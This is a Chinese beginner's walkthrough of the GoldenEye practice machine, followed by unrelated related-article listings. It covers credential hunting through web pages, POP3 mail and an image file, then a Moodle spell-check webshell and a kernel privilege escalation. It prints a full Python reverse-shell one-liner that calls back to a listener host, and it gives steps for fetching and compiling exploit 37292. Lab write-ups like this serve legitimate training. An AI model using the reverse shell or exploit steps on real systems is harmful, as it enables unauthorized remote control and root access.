Goldeneye靶机实操

  • 信息搜集
  • webshell
  • 用户提权

新手上路 请多多指教

信息搜集

接好靶机 发现IP为:192.168.8.144

发现 80端口开着 试试打开

用户是Boris无疑,密码是&#开头,盲猜unicode格式,站长之家一波,百度翻译的插件也可以

由于系统大小写敏感用户名被坑了~~hhh
多次尝试用户名为:boris 密码不变
/sev-home/登录后台


发现有用的信息,pop3端口被开启,转了一圈chrome发现后台刻意留下的两个账号。

按照pop3端口被打开的思路,给144这个ip做了个全套的马杀鸡

发现pop3被映射到55007。

密码错误,emmmmm,大脑失去连接~
没办法,搜了别人家的文章
https://blog.csdn.net/qq_38005854/article/details/105792834

嗯 密码归我了,就当是我家字典爆的。
在natalya用户第二篇邮件中发现重要信息


指定该用户名密码在特定url登录,要注意的是需要去host文件添加信息
C:\Windows\System32\drivers\etc

用第二封邮件提供的用户名密码登录系统。

翻箱倒柜 终于找到新用户


My email username是 doak
再次强迫没字典的我爆破,这这这,这不是搞人心态嘛

翻出刚刚文章~好的大哥,你怼密码的精神值得我白嫖,归我了23333
再次telnet

在邮件中获得新线索,用户名和密码拿去尝试

翻到一篇奇怪的信息(剧情用)

下载,

文中关键词admin以及下面一张jpg 密码应该就藏在图片中


linux的cat 命令 或者windows直接改后缀为.txt能看到goldeneye前面的关键信息,尝试各种解密 最后锁定为base64得到以下结果

进入/gnocertdir/ 输入新用户名以及密码

得到admin这个最后的用户。至此 web的最高用户拿到,moodle系统2.2.3版本信息获取到,信息搜集的部分也到此为止。

webshell


翻该版本的漏洞,发现这里有python的代码上传漏洞。使用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.152",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

构造监听机的ip以及开放端口,按钮保存。

监听该端口。


随便输入信息 点击检查 保存发送消息
可是kali还是监控不到信息,在此继续查找资料,找到这位大佬这么说

网上搜索看到一篇老外写的Walkthrough,目标主机上不存在GCC编译,只能CC编译,所以在需要把Google Spell编译改成PSpellShell编译。

这位大佬原文在此 ←

检测端口收到信息

python -c 'import pty; pyt.spawn("/bin/bash")'
uname -a
whoami

查询得到低权限用户www-data

用户提权

使用msf漏洞库中的37292号payload进行提权


将这篇payload中的gcc编译改为cc编译


用python搭建一个临时的文件服务器,目标主机就可以通过该服务器访问并下载payload。


使用低权限用户下载服务器下的文件37292.c 使用cc编译
-o 输出文件为 aa

修改aa文件的权限为可执行
打开payload

夺旗!

Goldeneye靶机实操相关推荐

  1. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  2. 【VulnHub靶场】——CFS三层靶机内网渗透实操

    作者名:白昼安全 主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:希望是你,最好是你,一定是你 嗨害嗨,我又回来啦,8月份 ...

  3. 【CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 Low难度 2.1 前戏 2.2 实验步骤 2.3 代码审计 3 Medium难度 3.1 前戏 3.2 实验思路 3.3 方法一:诱导点击 ...

  4. CISP-PTE实操练习之综合题讲解(win2008)

    CISP-PTE实操练习之综合题讲解(win2008) 文章目录 CISP-PTE实操练习之综合题讲解(win2008) 前言 一.win2008综合题讲解 1. 第一个key 2. 第二个Key 3 ...

  5. 「动手学深度学习」在B站火到没谁,加这个免费实操平台,妥妥天花板!

    论 AI 圈活菩萨,非李沐老师莫属. 前有编写「动手学深度学习」,成就圈内入门经典,后又在B站免费讲斯坦福 AI 课,一则艰深硬核讲论文的视频播放量36万,不少课题组从导师到见习本科生都在追番. 如此 ...

  6. 华为昇腾师资培训沙龙·南京场 |华为昇腾 ACL 语言开发实践全程干货来了!看完就实操系列...

    自今年疫情以来,AI 技术加速进入了人们的视线,在抗疫过程中发挥了重要作用,产业发展明显提速,我国逐步走出了一条由需求导向引领商业模式创新.市场应用倒逼基础理论和关键技术创新的发展道路,AI 人才的争 ...

  7. 完整代码+实操!手把手教你操作Faster R-CNN和Mask R-CNN

    点击上方↑↑↑蓝字关注我们~ 「2019 Python开发者日」全日程揭晓,请扫码咨询 ↑↑↑ 机器视觉领域的核心问题之一就是目标检测(Object Detection),它的任务是找出图像当中所有感 ...

  8. 实操教程|PyTorch AutoGrad C++层实现

    点击上方"视学算法",选择加"星标"或"置顶" 重磅干货,第一时间送达 作者丨xxy-zhihu@知乎 来源丨https://zhuanla ...

  9. 从原理到实操,看当前最佳的YOLO V4是如何炼成的?

    YOLO系列的网络都有一个共同的特点,即追求网络精度也追求网络速度,YOLO V4在此基础上又多了一个追求,那就是降低硬件要求. YOLO V4 的开发历程很有意思,其中评估.修改和整合了很多有趣的新 ...

最新文章

  1. 《分布式系统:概念与设计》一3.2 网络类型
  2. mysql5.0源码安装_linux小白 mysql5.0源码安装配置
  3. php中array怎么用,php中array()函数如何使用
  4. 《Android开发艺术探索》— Android 书籍
  5. Flink on K8s 在京东的持续优化实践
  6. TAOCP-Reading-计算机程序设计艺术阅读-1-1
  7. 五色电阻在线计算机,五色环电阻阻值在线计算一键生成计算器
  8. Centos Siege测试使用
  9. 分享几个在线生成头像的网站
  10. Oracle 基本操作
  11. 姓莫的女孩子叫什么名字好听
  12. bastion host - 堡垒主机 / 跳板机
  13. 全球虚拟运营商发展现状与探索
  14. SSLError: dh key to small(Python requests)
  15. linux shell 基本命令大全,常用的Linux shell命令详解收集整理
  16. python与js通用的数据结构_常见数据结构和Javascript实现总结
  17. 东华理工大学计算机考研资料汇总
  18. Web自定义报表前后端代码-使用dataTable插件实现自定义报表统计
  19. ​8400万!东阿阿胶电商销售战略再创佳绩
  20. 安卓应用/APP商店上架所需资质发布步骤

热门文章

  1. ZSS 支持excel的JDK分析
  2. 局域网内访问虚拟机 web 服务器
  3. 张越:智慧要包括一种向善之心
  4. rust 使用 ffi 调用 C 静态链接库
  5. 仲裁期间投的简历竟被转发给原公司,原公司HR给我发截图,并转达老板威胁:老板行业圈子广,仲裁公司,以后投简历都是这个下场!...
  6. mysql 临时表 主键_MySQL中临时表的基本创建与使用教程(CREATETEMPORARY TABLE)
  7. ORB-SLAM3 双目 Stereo + 论文
  8. 中星9号接收机各厂家芯片资料大全和升级接口针脚定义
  9. Ubuntu字库安装
  10. 计算机三级网络技术笔记(大题)